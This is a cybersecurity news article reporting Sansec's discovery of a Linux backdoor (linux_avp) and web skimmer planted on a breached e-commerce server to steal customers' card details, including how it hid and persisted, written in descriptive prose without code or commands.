Cybersecurity researchers have uncovered a new hacking strategy that deploys a Linux backdoor on hacked e-commerce servers and exfiltrates customers' personal information, including credit card details.
According to Sansec researchers, the hackers started automated e-commerce attack probes, testing for dozens of vulnerabilities in e-commerce websites. As soon as one is spotted, the attackers use PHP-coded web skimmer to download and insert fake payment forms into the checkout pages that the hacked online business displays to clients.
“We found that the attacker started with automated eCommerce attack probes, testing for dozens of weaknesses in common online store platforms. After a day and a half, the attacker found a file upload vulnerability in one of the store’s plugins. S/he then uploaded a web shell and modified the server code to intercept customer data,” the Sansec threat research team stated.
The Golang-based malware, which was unearthed on the same site by Dutch cyber-security firm Sansec, was downloaded and executed on infiltrated servers as a linux_avp executable. Once deployed, it immediately removes itself from the disk and disguises itself as a "ps -ef" process that would be used to retrieve a list of presently active processes.
While examining the linux_avp backdoor, the researchers discovered that it waits for commands from a Beijing server on Alibaba’s network.
Additionally, the malware can gain persistence by inserting a new crontab entry that would redownload the malicious payload from its command-and-control server and reinstall the backdoor if detected and removed or the server restarts.
Unfortunately, this backdoor remains undetected by anti-malware engines on VirusTotal even though a sample was first uploaded more than one month ago, on October 8th. The uploader might be the linux_avp designer since it was submitted one day after researchers discovered it while examining the e-commerce site breach.
“Curiously, one individual had submitted the same malware to Virustotal on Oct 8th with the comment test. This was just one day after the successful breach of our customer’s store. The person uploading the malware could very well be the malware author, who wanted to assert that common antivirus engines will not detect their creation,” said researchers.